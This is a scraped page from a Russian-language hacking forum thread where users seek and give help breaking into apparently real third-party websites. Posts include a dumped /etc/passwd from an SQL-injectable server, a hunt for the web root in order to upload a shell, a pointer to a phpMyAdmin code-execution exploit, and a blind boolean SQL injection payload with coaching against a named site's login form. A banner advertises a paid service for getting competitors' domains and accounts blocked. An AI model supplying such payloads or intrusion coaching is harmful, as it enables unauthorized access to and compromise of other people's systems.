УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2406 из 2438

2406

Опции темы

Поиск в этой теме

Опции просмотра

#24051

02.02.2015, 20:01

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от d4rk73rr0r

d4rk73rr0r said:
Всем добрый вечер. Ребята помогите раскрыть путь к сайта.
http://subdomain1.subdomain2.domain.com/
web server operating system: Linux Ubuntu 11.10 (Oneiric Ocelot)
web application technology: Apache 2.2.20, PHP 5.3.6
back-end DBMS: MySQL 5.0
пробовал и нашел:

Код:

Code:
/etc/apparmor.d/usr.sbin.mysqld
/var/run/mysqld/mysqld.sock
/etc/mysql/my.cnf
/etc/init.d/mysql
/etc/hosts
/etc/passwd

-------------------------------------
Результат ноль:

Код:

Code:
·         /var/www/html/
·         /var/www/web1/html/
·         /var/www/sitename/htdocs/
·         /var/www/localhost/htdocs
·         /var/www/vhosts/sitename/httpdocs/
·         /etc/init.d/apache
·         /etc/init.d/apache2
·         /etc/httpd/httpd.conf
·         /etc/apache/apache.conf
·         /etc/apache/httpd.conf
·         /etc/apache2/apache2.conf
·         /etc/apache2/httpd.conf
·         /usr/local/apache2/conf/httpd.conf
·         /usr/local/apache/conf/httpd.conf
·         /opt/apache/conf/httpd.conf
·         /home/apache/httpd.conf
·         /home/apache/conf/httpd.conf
·         /etc/apache2/sites-available/default
·         /etc/apache2/vhosts.d/default_vhost.include

---------------------------------------
etc/passwd

Код:

Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vps68:x:1000:1000:vps68,,,:/home/vps68:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

не могу найти путь к апаче

LFI? что, конкретно, нужно? если error_log или access_log, попробуйте /proc/self/fd/2 и /proc/self/fd7 соответственно. да и список путей на ваших не ограничивается: /thread324564.html, http://rafale.org/~mattoufoutu/darkc0de.com/c0de/php/DarkLFI.txt

стоит также погуглить на наличие еще возможных путей.

#24052

02.02.2015, 20:09

d4rk73rr0r

Guest

Сообщений: n/a

Провел на форуме:
34107

Репутация: 0

извиняюсь, Это не LFI, а скул инъекция вообще то. есть file_priv=Y. мне нужна путь к сайта что бы залить шел. там нету даже пхпинфо или phpmyadmin . Я здесь все пробовал: /thread324564.html

#24053

02.02.2015, 20:15

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от d4rk73rr0r

d4rk73rr0r said:
извиняюсь, Это не LFI, а скул инъекция вообще то. есть file_priv=Y. мне нужна путь к сайта что бы залить шел. там нету даже пхпинфо или phpmyadmin . Я здесь все пробовал: /thread324564.html

пройдитесь еще по второму словарю. также, методы для раскрытия путей: https://rdot.org/forum/showthread.php?t=82

#24054

03.02.2015, 20:22

Vip77

Guest

Сообщений: n/a

Провел на форуме:
46989

Репутация: 20

Есть сайт с версией phpMyAdmin 2.11.11.3 , setup и signon не удаляли.

Попробовал этот сплоит https://rdot.org/forum/showpost.php?p=13736&postcount=6 .

Получил какие-то куки, но после подмены все ровно требует пароль.

Какие вообще есть уязвимости под phpMyAdmin 2.11.11.3?

#24055

04.02.2015, 06:34

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

Код:

Code:
http://mez{REMOVE THIS}calent.com

Скулы в форме авторизации. Но из-за редиректа не могу норм раскрутить. Ребят, будут подсказки?

#24056

04.02.2015, 09:39

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от vikler

vikler said:

Код:

Code:
http://mez{REMOVE THIS}calent.com

Скулы в форме авторизации. Но из-за редиректа не могу норм раскрутить. Ребят, будут подсказки?

email=-1'or(mid(version(),1,1)=5)--&password=qwerty

#24057

04.02.2015, 17:01

vikler

Guest

Сообщений: n/a

Провел на форуме:
36068

Репутация: 0

Цитата:

Сообщение от YaBtr

YaBtr said:
email
=
-1'or(mid(version(),1,1)=5)--
&
password
=qwerty

хмм, спасибо, ответ правда тот же:

Код:

Code:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/mezcalent.com/httpdocs/public_actions.php on line 536

не вижу вывода версии

#24058

04.02.2015, 17:17

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от vikler

vikler said:
хмм, спасибо, ответ правда тот же:

Код:

Code:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/mezcalent.com/httpdocs/public_actions.php on line 536

не вижу вывода версии

При слепых! инъекциях Вы и не увидите вывода. Играетесь с boolean-query. В Вашем случае при истине возвращается страница /renew.php?id=1, в обратном же случае начальная страница авторизации.

#24059

04.02.2015, 18:01

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Vip77

Vip77 said:
Есть сайт с версией phpMyAdmin 2.11.11.3 , setup и signon не удаляли.
Попробовал этот сплоит https://rdot.org/forum/showpost.php?p=13736&postcount=6 .
Получил какие-то куки, но после подмены все ровно требует пароль.
Какие вообще есть уязвимости под phpMyAdmin 2.11.11.3?

http://packetstormsecurity.com/files/121275/phpMyAdmin-Session-Serialized-Code-Execution.html

при mq = off и PHP

#24060

05.02.2015, 01:58

Vip77

Guest

Сообщений: n/a

Провел на форуме:
46989

Репутация: 20

Цитата:

Сообщение от faza02

faza02 said:
http://packetstormsecurity.com/files/121275/phpMyAdmin-Session-Serialized-Code-Execution.html

Session path was not found =/

[QUOTE="faza02"]
faza02 said:
при mq = off и PHP

Страница 2406 из 2438

2406

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход